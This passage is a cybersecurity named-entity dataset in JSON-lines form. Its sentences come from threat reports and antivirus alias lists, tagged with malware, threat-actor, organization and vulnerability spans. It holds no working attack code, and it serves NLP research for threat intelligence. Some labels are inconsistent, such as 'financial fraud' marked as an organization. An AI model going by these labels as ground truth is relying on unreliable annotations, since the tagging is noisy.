.diablo6": [[0, 14]], "THREAT_ACTOR: campaign": [[15, 23]]}, "info": {"id": "cyner2_train_005303", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Injector.FC.81 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Dwn.dzugvc TrojWare.MSIL.Disfa.B Trojan.DownLoader17.15248 BehavesLike.Win32.Trojan.fc Trojan.MSIL.Crypt Trojan.Razy.D1AD5 Spyware.Imminent MSIL/Kryptik.EAN!tr Win32/Trojan.982", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005308", "source": "cyner2_train"}} {"text": "Using this and other dangerous applications uploaded by Linux.PNScan.1 to the compromised device, cybercriminals can hack administrative control panel of PHPMyAdmin, which is used to manage 
relational databases, and brute-force authentication credentials to get unauthorized access to various devices and servers via the SSH protocol.", "spans": {"SYSTEM: dangerous applications": [[21, 43]], "SYSTEM: compromised device,": [[78, 97]], "VULNERABILITY: PHPMyAdmin,": [[154, 165]], "VULNERABILITY: brute-force authentication credentials": [[216, 254]]}, "info": {"id": "cyner2_train_005309", "source": "cyner2_train"}} {"text": "During our analysis of this malware we uncovered interesting code paths and other artifacts that may indicate a Mac or Unix variant of this same tool also exists.", "spans": {"MALWARE: malware": [[28, 35]], "SYSTEM: Mac": [[112, 115]], "SYSTEM: Unix variant": [[119, 131]], "MALWARE: tool": [[145, 149]]}, "info": {"id": "cyner2_train_005310", "source": "cyner2_train"}} {"text": "Aside from this campaign's motivation, what grabbed our attention was the way it utilizes pCloud, a free cloud service, for data storage and communication.", "spans": {"THREAT_ACTOR: this campaign's": [[11, 26]], "SYSTEM: a free cloud service,": [[98, 119]], "SYSTEM: data storage": [[124, 136]], "SYSTEM: communication.": [[141, 155]]}, "info": {"id": "cyner2_train_005312", "source": "cyner2_train"}} {"text": "In this third part of Unit 42's Cybercrime Underground blog series, we're taking a slightly different approach.", "spans": {"ORGANIZATION: Unit 42's Cybercrime Underground": [[22, 54]]}, "info": {"id": "cyner2_train_005313", "source": "cyner2_train"}} {"text": "These deceptive sites are carefully crafted to trick unsuspecting users into downloading and executing malware, which can result in stealing the victim's sensitive data.", "spans": {"MALWARE: malware,": [[103, 111]]}, "info": {"id": "cyner2_train_005314", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PSW.Win32.QQPass!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/QQPass.ZQ Trojan-PSW.Win32.QQPass.gkd Trojan.Win32.QQPass.vwban Backdoor.W32.DsBot.l5eP Trojan.PWS.Lineage.10130 
BehavesLike.Win32.RAHack.cm Trojan/PSW.QQPass.fng Trojan[GameThief]/Win32.Lmir Win32.Troj.QQPswT.bs.116858 Trojan.Graftor.Elzob.D486F Trojan.Tencent/Variant Trojan-PSW.Win32.QQPass.gkd SScope.Trojan-PSW.Win32.Delf.bav Worm.Win32.AutoRun", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005316", "source": "cyner2_train"}} {"text": "In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms.", "spans": {"ORGANIZATION: FireEye": [[22, 29]], "THREAT_ACTOR: a phishing campaign": [[39, 58]], "ORGANIZATION: seven global law and investment firms.": [[78, 116]]}, "info": {"id": "cyner2_train_005319", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Injector Trojan.Win32.Dwn.edybnj Trojan.Win32.Z.Razy.328168 Win32.Trojan.Falsesign.Phqf Trojan.DownLoader21.41335 Trojan.MSIL.Crypt TR/Dropper.MSIL.inryd Trojan.Razy.D11CB7 Trojan:Win32/Censer.A Trj/CI.A MSIL/Kryptik.GLN!tr Win32/Trojan.Dropper.32d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005320", "source": "cyner2_train"}} {"text": "A strong relationship between previously identified malware samples attributed to these campaigns and the newly discovered samples examined in this report.", "spans": {"MALWARE: malware samples": [[52, 67]], "MALWARE: campaigns": [[88, 97]]}, "info": {"id": "cyner2_train_005321", "source": "cyner2_train"}} {"text": "We have already seen large campaigns targeting Europe and other parts of the world in 2014 and 2015.", "spans": {"THREAT_ACTOR: campaigns": [[27, 36]]}, "info": {"id": "cyner2_train_005322", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Chet.20484 W32/Chet.c@MM W32/Chet.e Trojan.Win32.Chet.emgc W32.Chet@mm Win32/Chet.E Email-Worm.Win32.Chet.e I-Worm.Chet!g52sFTlFeyo I-Worm.Win32.Chet.20484.C[h] Worm.Win32.Chet.E Win32.HLLM.Otchet.20484 Worm.Chet.Win32.4 W32/Chet.c@MM W32/Risk.ZNRZ-7753 I-Worm/Chet.a W32/Chet.E!worm 
Worm[Email]/Win32.Chet W32.W.Chet.e!c Win32/Chet.worm.20484.C Worm:Win32/Chet.E@mm Win32/Chet.E Worm.Chet Win32.Worm-email.Chet.Szlk Email-Worm.Win32.Chet I-Worm/Chet.C Worm.Win32.Chet.e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005323", "source": "cyner2_train"}} {"text": "A backdoor also known as: Downloader.Small.Win32.7020 Trojan/Downloader.Small.bdc Win32.Trojan.WisdomEyes.16070401.9500.9963 W32/Downloader.DXO TROJ_TENGADL.A Win.Downloader.Tenga-1 Trojan-Downloader.Win32.Small.bdc Trojan.Win32.Small.glqe Trojan.Win32.Downloader.3072.B Troj.Downloader.W32.Small.bdc!c TrojWare.Win32.TrojanDownloader.Small.BDC Trojan.DownLoader.3449 TROJ_TENGADL.A W32/Downloader.GWIH-8231 TrojanDownloader.Small.bqb W32.Malware.Downloader TR/Dldr.Small.bdc.2 Trojan[Downloader]/Win32.Small TrojanDownloader:Win32/Gael.A Trojan-Downloader.Win32.Small.bdc Trojan/Win32.Downloader.C22709 Trojan-Downloader.Win32.Utenti Trj/Downloader.DNX Win32/TrojanDownloader.Small.BDC Win32.Trojan-downloader.Small.Wrpx Trojan.DL.Small!rnjf8eX9OeE Trojan-Downloader.Win32.Small W32/Small.BDC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005324", "source": "cyner2_train"}} {"text": "In order to infect the victims, the attackers distributed spear-phishing email, which purports to have been sent from NIC's Incident response team, the attackers spoofed an email id that is associated with Indian Ministry of Defence to send out email to the victims.", "spans": {"ORGANIZATION: victims,": [[23, 31]], "THREAT_ACTOR: attackers": [[36, 45], [152, 161]], "ORGANIZATION: NIC's Incident response team,": [[118, 147]], "ORGANIZATION: Indian Ministry of Defence": [[206, 232]], "ORGANIZATION: victims.": [[258, 266]]}, "info": {"id": "cyner2_train_005325", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Paramcud TROJ_UMPER.SMSE Backdoor.Win32.3Para.e TROJ_UMPER.SMSE W32/Adware.KYIR-6825 Trojan.Adware.Symmi.D781 Trojan:Win32/Umper.A", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005326", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/IllNotifier.d TROJ_ILLNOTIF.D Win32.Trojan.WisdomEyes.16070401.9500.9964 TROJ_ILLNOTIF.D Trojan-Notifier.Win32.IllNotifier.d Trojan.Win32.IllNotifier.diak Trojan.Win32.IllNotifier.4096 Troj.Notifier.W32.IllNotifier.d!c Win32.TrojanNotifier.IllNotif.D Trojan.Illnot TrojanNotifier.IllNotifier.b TR/IllNotifier.D.1 Trojan-Notifier.Win32.IllNotifier.d Trojan:Win32/IllNotif.D TrojanNotifier.IllNotifier Trj/Notifier.C Win32/TrojanNotifier.IllNotif.D Trojan.IllNotifier!nSHIqsfdJ3I W32/IllNotifier.D!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005328", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.IrcbotFamTMS.Worm W32/CubsPewt.worm Backdoor.RBot.Win32.1857 Trojan.Heur.VP2.Cy2aaWGg!Jbi WORM_CUBSPEW.SMD Win32.Trojan.WisdomEyes.16070401.9500.9943 W32/Worm.ATKB W32.SillyFDC Win32/Cubspewt.E WORM_CUBSPEW.SMD Win.Trojan.Mybot-11593 Trojan.Win32.Rbot.baglt Win32.Worm.Autorun.Wqwe Win32.HLLW.Autoruner.7400 BehavesLike.Win32.Dropper.gc W32/Worm.ZJYN-5347 Backdoor/RBot.jco Trojan[Backdoor]/Win32.Rbot Worm:Win32/Cubspewt.A Backdoor.Win32.IRCBot.425984.C Worm/Win32.IRCBot.R7984 Backdoor.Rbot Backdoor.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005331", "source": "cyner2_train"}} {"text": "Threat actors are now using this previously unseen executable, created by Samsung, to load variants of the PlugX Trojan.", "spans": {"THREAT_ACTOR: Threat actors": [[0, 13]], "ORGANIZATION: Samsung,": [[74, 82]], "MALWARE: PlugX Trojan.": [[107, 120]]}, "info": {"id": "cyner2_train_005333", "source": "cyner2_train"}} {"text": "Poison Ivy has a convenient graphical user interface GUI for managing compromised hosts and provides easy access to a rich suite of post-compromise tools.", "spans": {"MALWARE: Poison Ivy": [[0, 10]], "SYSTEM: hosts": [[82, 87]], "MALWARE: 
post-compromise tools.": [[132, 154]]}, "info": {"id": "cyner2_train_005334", "source": "cyner2_train"}} {"text": "A direct trail was established over a period of years that would lead competent researchers to finger CN operators as responsible for this new activity as well.", "spans": {"ORGANIZATION: researchers": [[80, 91]], "THREAT_ACTOR: CN operators": [[102, 114]]}, "info": {"id": "cyner2_train_005335", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropped:Trojan.Downloader.JKFJ Dropped:Trojan.Downloader.JKFJ Trojan.Downloader.JKFJ Trojan.DownLoad.6115 Dropped:Trojan.Downloader.JKFJ Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005336", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Llac BKDR_COMDAR.SMI Win32.Trojan.WisdomEyes.16070401.9500.9967 BKDR_COMDAR.SMI Win.Trojan.Killav-107 Trojan.Win32.Llac.dpis Trojan.Win32.Hupigon.bjsvj Trojan.Win32.Z.Hupigon.631808 Troj.W32.Llac!c Backdoor.Win32.Amtar.~dkc1 BackDoor.Comet.345 Backdoor.Hupigon.Win32.87925 BehavesLike.Win32.Dropper.jh Trojan/Scar.bmme Trojan[Backdoor]/Win32.Hupigon TrojanDownloader:Win32/Hupigon.C Trojan.Win32.Llac.dpis Trojan/Win32.Hupigon.C98989 TScope.Trojan.Delf Win32.Trojan.Llac.Swuk Virus.Win32.Delf.DTW Win32/Trojan.713", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005337", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropped:Backdoor.SchoolBus.C Backdoor.Schoolbus BackDoor-BL.dr Backdoor.W32.Schoolbus!c W32/Backdoor2.XLL Backdoor.Trojan BKDR_SCHOOLBUS.C Dropped:Backdoor.SchoolBus.C Backdoor.Win32.SchoolBus.15 Dropped:Backdoor.SchoolBus.C Backdoor.Win32.Z.Schoolbus.257515 Dropped:Backdoor.SchoolBus.C Dropped:Backdoor.SchoolBus.C BackDoor.SchoolBus Email-Worm.Win32.GOPworm.196 BKDR_SCHOOLBUS.C BehavesLike.Win32.Dropper.dc W32/Backdoor.CDSN-7186 BDS/SchoolBus.C.DR.8 Backdoor:Win32/Schoolbus.C.dr Backdoor.Win32.SchoolBus.15 Backdoor/Win32.Trojan.C197204 
Dropped:Backdoor.SchoolBus.C Email-Worm.Win32.GOPworm.196 Backdoor.Schoolbus Bck/Iroffer.BG Backdoor.SchoolBus.C Win32/SchoolBus.C Win32.Backdoor.Schoolbus.pfo Backdoor.SchoolBus.C Win32/Trojan.374", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005338", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.JKVR Backdoor.Pingbed Trojan.Downloader.JKVR Win32.Trojan.WisdomEyes.16070401.9500.9987 W32/Backdoor2.HAEI BKDR_PINGBED.A Trojan.Downloader.JKVR Trojan.Downloader.JKVR Trojan.Downloader.JKVR Trojan.Downloader.JKVR BKDR_PINGBED.A BehavesLike.Win32.PWSOnlineGames.pt W32/Backdoor.DODB-2037 Backdoor:Win32/Pingbed.A Trojan/Win32.Dllbot.R15525 Trojan.Downloader.JKVR Win32/Trojan.Downloader.d4d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005339", "source": "cyner2_train"}} {"text": "Mad Max is a targeted trojan that uses a domain generation algorithm DGA", "spans": {"MALWARE: Mad Max": [[0, 7]], "MALWARE: targeted trojan": [[13, 28]]}, "info": {"id": "cyner2_train_005340", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9987 Win.Trojan.Enfal-36 DLOADER.Trojan BehavesLike.Win32.BadFile.qt Trojan.Heur.EED22D0 Backdoor.Win32.PcClient", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005342", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.PgxviewI.Trojan Win32.Worm.Donked.b Win32/Donked.A Win.Worm.Autorun-7941 Win32.Worm.Donked.A Trojan.Disabler.64 W32/Autorun.worm.he Worm:Win32/Donked.A Win32/Autorun.worm.40960.DM W32/Autorun.worm.he I-Worm.Donked.A Win32/Donked.A Worm.Donked!DgcwScp6hHo W32/Donked.BB!tr Win32/Trojan.88a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005343", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MulDrop7.11292 Trojan.Injector.Win32.494093 Trojan.Fsysna.guw TR/AD.NETCryptor.xslwu Trojan.MSILPerseus.D15D13 
Trojan/Win32.MSILKrypt.R210547 Trj/GdSda.A Trojan.Injector!cLW3TSG0Mi8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005344", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Flashy.Trojan Packed.Win32.TDSS!O Trojan.Disabler.Win32.3 Trojan/Disabler.i WORM_FLASHY.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Glupzy.A Win32/Glupzy.A WORM_FLASHY.SM Win.Trojan.Disabler-3 Trojan.Win32.Disabler.i Trojan.Win32.Disabler.reit Trojan.Win32.Disabler.21185 Win32.Trojan.Fakedoc.Auto Trojan.Flashy BehavesLike.Win32.Dropper.cz Trojan/Disabler.al TR/Disabler.I Trojan/Win32.Disabler Worm:Win32/Glupzy.A W32.W.VB.kZz1 Trojan.Win32.Disabler.i Trojan/Win32.HDC.C51559 Trojan.Flasher.2913 RiskWare.Tool.CK Win32/Disabler.I Trojan.Disabler!sfd9qm983h8 Virus.Win32.Virut W32/Disabler.I!tr Trj/Flashy.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005345", "source": "cyner2_train"}} {"text": "A backdoor also known as: BehavesLike.Win32.Conficker.mc Trojan.Razy.D1B4E2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005346", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.Trojan.Gamex.A Android.FakeUpdate.B Android.Trojan.Gamex.A Android.Trojan.Gamex.e AndroidOS/Gamex.A Android.Mobigapp A.H.Rog.Gamex.B Trojan:Android/Gamex.C Android.DownLoader.1561 AndroidOS/Gamex.A ANDROID/Mobigapp.A Android.Trojan.Gamex.A Android-Trojan/Gamex.1cbc Trojan.AndroidOS.FakeSite.A Android.Trojan.Gamex.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005349", "source": "cyner2_train"}} {"text": "The ransomeware also leaves the notes README_HOW_TO_UNLOCK.html and README_HOW_TO_UNLOCK.txt throughout the system.", "spans": {"MALWARE: ransomeware": [[4, 15]], "SYSTEM: system.": [[108, 115]]}, "info": {"id": "cyner2_train_005351", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Jorik.Banker!O Trojan.Zusy.D689D 
Win32.Trojan.WisdomEyes.16070401.9500.9545 W32/Trojan.WDRL-5915 Trojan-Banker.Win32.TuaiBR.edq Trojan.Win32.Zusy.dckfkl Troj.W32.Jorik.Banker.dnz!c Win32.Trojan-banker.Tuaibr.Wlfg Trojan.Jorik.Win32.164763 TR/Spy.Banker.UV Trojan/Win32.Banker TrojanProxy:MSIL/Banker.G Trojan-Banker.Win32.TuaiBR.edq Trojan/Win32.Proxy.C910983 MSIL/Banker.AK!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005352", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Boaxxe.E Win32.Trojan.WisdomEyes.16070401.9500.9985 TROJ_ZBOT.SMUI Packed.Win32.Krap.iu Win32.Trojan.Falsesign.Dvgf TrojWare.Win32.Kryptik.ZLB Trojan.DownLoad3.832 TROJ_ZBOT.SMUI Trojan.Win32.Cleaman Trojan/Menti.sbs Trojan[Packed]/Win32.Krap Trojan:Win32/Cleaman.B Packed.Win32.Krap.iu Trojan/Win32.Menti.R20809 SScope.Malware-Cryptor.SB.01798 Bck/Qbot.AO Trojan.Conjar.8 Trojan.Kryptik!pGFdk5FNPhE Win32/Trojan.0ce", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005355", "source": "cyner2_train"}} {"text": "A backdoor also known as: SMSFraud.d Win32/Hoax.ArchSMS.KC Hoax.Win32.ArchSMS.hsgx Trojan.SMSSend.520 SMSFraud.d Hoax/Win32.ArchSMS Program:Win32/Pameseg.U Hoax.Win32.ArchSMS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005359", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.ShitOverVBx.PE Trojan.Win32.Cosmu!O W32.Lamer.EL3 Trojan.Downloader Downloader.VB.Win32.9689 Troj.Downloader.W32.VB.l4ji Trojan/Downloader.VB.eex TROJ_DLOADR.SMM Win32.Virus.VBbind.a W32/Worm.BAOX W32.Besverit Win32/VB.P TROJ_DLOADR.SMM Virus.Win32.Lamer.el Trojan.Win32.VB.csnpye Worm.Win32.VB.kp Win32.HLLW.Autoruner.6014 BehavesLike.Win32.Dropper.rh W32/Worm.EMYS-2108 Trojan/VB.kro WORM/VB.NVA Virus/Win32.Lamer.el Trojan:Win32/Dorv.A Trojan.Win32.Downloader.90650.B Virus.Win32.Lamer.el Win32.Application.Unwanted.B Dropper/Win32.Cosmu.R14017 SIM.Trojan.VBO.0859 Trojan.Cosmu Win32/AutoRun.VB.JP Worm.VB.FMYJ Worm.Win32 
W32/OverDoom.A Worm.Win32.VB.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005360", "source": "cyner2_train"}} {"text": "Starting on October 28, we found that these two vulnerabilities were being targeted by the Angler and Nuclear exploit kits.", "spans": {"VULNERABILITY: vulnerabilities": [[48, 63]], "MALWARE: Angler": [[91, 97]], "MALWARE: Nuclear exploit kits.": [[102, 123]]}, "info": {"id": "cyner2_train_005363", "source": "cyner2_train"}} {"text": "Unfortunately, the attack is still active and the number of victims has been increasing.", "spans": {}, "info": {"id": "cyner2_train_005364", "source": "cyner2_train"}} {"text": "An email with the subject of UK Fuels Collection pretending to come from invoices@ebillinvoice.com with a malicious word doc attachment delivers some sort of malware.", "spans": {"MALWARE: malicious word doc": [[106, 124]], "MALWARE: malware.": [[158, 166]]}, "info": {"id": "cyner2_train_005366", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9805 Trojan.MulDrop7.45925 BehavesLike.Win32.Trojan.hc W32/Trojan.OQZZ-1308 TR/Ransom.JigsawLocker.dneeo Trojan.MSILPerseus.D1E5AF Ransom:MSIL/JigsawLocker.A Ransom.Jigsaw Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005367", "source": "cyner2_train"}} {"text": "A backdoor also known as: WS.Reputation.1 TROJ_SPNR.08JS11 TROJ_SPNR.08JS11 Trojan:MSIL/Reploxar.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005368", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Downloader.EAC O97M.Downloader.GQ W97M.Downloader.EAC W2KM_FAREIT.YYSVN W97M.Downloader.EAC W97M.Downloader.EAC Trojan.Script.MLW.egddty W97M.Downloader.EAC W97M.Downloader.EAC W2KM_FAREIT.YYSVN W97M/Downloader.bhi HEUR/Macro.Downloader Trojan:O97M/Macrobe.D W97M.Downloader.EAC W97M/Downloader.bhi virus.office.obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_train_005369", "source": "cyner2_train"}} {"text": "This group is known to have targeted U.S. government agencies, defense contractors, aerospace firms and foreign militaries since 2009.", "spans": {"THREAT_ACTOR: group": [[5, 10]], "ORGANIZATION: U.S. government agencies, defense contractors, aerospace firms and foreign militaries": [[37, 122]]}, "info": {"id": "cyner2_train_005370", "source": "cyner2_train"}} {"text": "Unfortunately, at any given point in time, there are thousands of sites that allow users to illegally stream pirated content, and they often manage to devise strategies that allow them to monetize their illegally sourced content with programmatic advertising.", "spans": {}, "info": {"id": "cyner2_train_005371", "source": "cyner2_train"}} {"text": "A backdoor also known as: Downloader.Small.Win32.7325 Dialer.DialerPlatformLimited Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Downloader.AULY Trojan.Packed.14 Win32/TrojanDownloader.Small.CXG TROJ_OBFUSCAT.EY Win.Trojan.Dialer-266 Trojan.Win32.Busky.cvqace TrojWare.Win32.TrojanDownloader.Small.CXG Trojan.DownLoader.based Trojan-Downloader.Win32.Busky W32/Downloader.MCGP-7971 Trojan[Downloader]/Win32.Busky TrojanDownloader:Win32/Beenut.A Win32/SillyDl.PW MalwareScope.Trojan-Downloader.Obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005372", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Potential.A Trojan/DownloaderKrap.ii Trojan.Zbot.6 Win32.Trojan.Kryptik.b W32.Priter Win32/SillyDl.YFM Packed.Win32.Krap.ii Virus.Win32.CrazyPrier.lrspi Packer.W32.Krap!c TrojWare.Win32.PkdKrap.II BehavesLike.Win32.HLLPPhilis.nh Packed.Krap.dqky Win32.Troj.fo.40176 TrojanDownloader:Win32/Potentialdownloader.A Packed.Win32.Krap.ii Trojan/Win32.Downloader.R3327 Trojan.Win32.Small.pck Trojan.Win32.Crazyman1649.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005374", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: Win32.Lassab.A@mm Email-Worm.Win32!O W32/Lassa.b Worm.Lassorm.Win32.1 W32/Lassa.B Win32.Lassab.E90817 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Lassie.B Win.Worm.Lassorm-1 Win32.Lassab.A@mm Email-Worm.Win32.Lassorm Win32.Lassab.A@mm Trojan.Win32.Lassorm.emyb Win32.Lassab.A@mm Win32.Lassab.A@mm W32/Lassa.b Email-Worm.Win32.Lassorm Worm[Email]/Win32.Lassorm Worm:Win32/Lassab.A@mm Email-Worm.Win32.Lassorm Worm/Win32.Lassorm.C1532344 Win32.Lassab.A@mm Worm.Lassorm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005375", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.DF97 Win32.Zafi.B@mm W32/Zafi.b@MM W32.W.Otwycal.l4av Win32.Zafi.B@mm Win32.Zafi.E2C45E Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Erkez.B@mm Email-Worm.Win32.Zafi.b Trojan.Win32.Zafi.icie Win32.Zafi.B@mm Win32.Hazafi.30720 BehavesLike.Win32.RAHack.mm I-Worm/Zafi.b Worm[Email]/Win32.Zafi Worm:Win32/Zafi.B@mm Email-Worm.Win32.Zafi.b Win32.Zafi.B@mm Win32.Zafi.B@mm W32/Zafi.B.worm Win32/Zafi.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005376", "source": "cyner2_train"}} {"text": "TA569 is a prolific threat actor primarily known for its deployment of website injections leading to a JavaScript payload known as SocGholish.", "spans": {"THREAT_ACTOR: TA569": [[0, 5]], "THREAT_ACTOR: prolific threat actor": [[11, 32]], "MALWARE: JavaScript payload": [[103, 121]], "MALWARE: SocGholish.": [[131, 142]]}, "info": {"id": "cyner2_train_005377", "source": "cyner2_train"}} {"text": "Here is a nice example that my spam trap captured a few days ago.", "spans": {}, "info": {"id": "cyner2_train_005379", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Bebloh.Win32.427 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Injector.CMX TROJ_HPISDA.SM2 Trojan.Win32.NaKocTb.eiktob Trojan.Win32.Inject.213504 Troj.W32.Inject.tn8S BackDoor.Bebloh.272 TROJ_HPISDA.SM2 BehavesLike.Win32.Downloader.ch 
W32/Injector.UCTI-2382 Trojan.Inject.tpn Trojan/Win32.Inject Trojan.Strictor.D1C966 Backdoor:Win32/Carrotime.A Trojan/Win32.Inject.C1667127 Trj/RansomCrypt.J W32/Kryptik.FJVT!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005381", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Downloader Worm.Downloader.Win32.3750 Win32.Trojan.WisdomEyes.16070401.9500.9984 Trojan.Dropper Win.Exploit.Fnstenv_mov-1 Worm.Win32.Downloader.am Trojan.Win32.Rubbish.evjgzp Trojan.Win32.Z.Downloader.135168.A Troj.GameThief.W32.OnLineGames.kZce Worm.Win32.Jalous.K Win32.HLLW.Rubbish BehavesLike.Win32.Downloader.ct Trojan.Win32.KillAV Worm/Downloader.ays EXP/Flash.EB.625 Worm/Win32.Downloader Win32.Troj.DwonLoaderT.xy.133203 Trojan:Win32/Elfapault.A Worm.Win32.Downloader.am Worm/Win32.Downloader.R2522 Win32/Jalous.K Win32.Worm.Downloader.Szlf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005382", "source": "cyner2_train"}} {"text": "This can be anywhere from using the same strings, to weak obfuscation routines, or re-using the same snippet of code.", "spans": {}, "info": {"id": "cyner2_train_005383", "source": "cyner2_train"}} {"text": "In July 2017 we discovered a malicious email sample delivering a new variant of Ursnif, attached within an encrypted Word document with the plaintext password within the email body.", "spans": {"MALWARE: variant": [[69, 76]], "MALWARE: Ursnif,": [[80, 87]]}, "info": {"id": "cyner2_train_005385", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Maener.A5 Trojan/CoinMiner.uy Trojan.Zusy.D19BD4 Win32/Tnega.AHKfcVD Win.Trojan.Maener-1 Trojan.Win32.BitCoinMiner.dfdxgr TrojWare.Win32.Graftor.PQIF Trojan.DownLoader11.43085 BehavesLike.Win32.AdwareLinkury.dm Trojan.Win32.CoinMiner Trojan:Win32/Maener.C!bit Trojan.BitCoinMiner Trojan.CoinMiner!oi2LJpWWJQU W32/CoinMiner.TY!tr Win32/Trojan.9e3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_005388", "source": "cyner2_train"}} {"text": "Recently, the Winnti group, a threat actor with a past of traditional cybercrime -particularly with financial fraud, has been seen abusing GitHub by turning it into a conduit for the command and control C and C communications of their seemingly new backdoor detected by Trend Micro as BKDR64_WINNTI.ONM.", "spans": {"THREAT_ACTOR: the Winnti group, a threat actor": [[10, 42]], "THREAT_ACTOR: traditional cybercrime": [[58, 80]], "ORGANIZATION: financial fraud,": [[100, 116]], "SYSTEM: GitHub": [[139, 145]], "MALWARE: backdoor": [[249, 257]], "ORGANIZATION: Trend Micro": [[270, 281]]}, "info": {"id": "cyner2_train_005391", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Vinself.B Trojan.Vinself Trojan.PWS.DPD.8 BehavesLike.Win32.VTFlooder.ch Trojan.Symmi.DA32B Backdoor:Win32/Wakbot.B Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005392", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Banker.evqhye BehavesLike.Win32.Dropper.ph W32/Trojan.SNBX-9361 TR/Spy.Banker.fyxgc Trojan.Symmi.DC916 Trj/GdSda.A Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005394", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Win32.Trojan.WisdomEyes.16070401.9500.9888 Trojan.Giku.Win32.37 BehavesLike.Win32.Ransomware.fc TrojanDownloader:Win32/Gladgerown.B Trojan-Proxy.AOSK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005395", "source": "cyner2_train"}} {"text": "While Panda Banker has become more prevalent in recent weeks, we have been tracking a large campaign this week targeting banks in Europe and Australia and, interestingly, UK online casinos and international online payment systems.", "spans": {"MALWARE: Panda Banker": [[6, 18]], "THREAT_ACTOR: large campaign": [[86, 100]], "ORGANIZATION: 
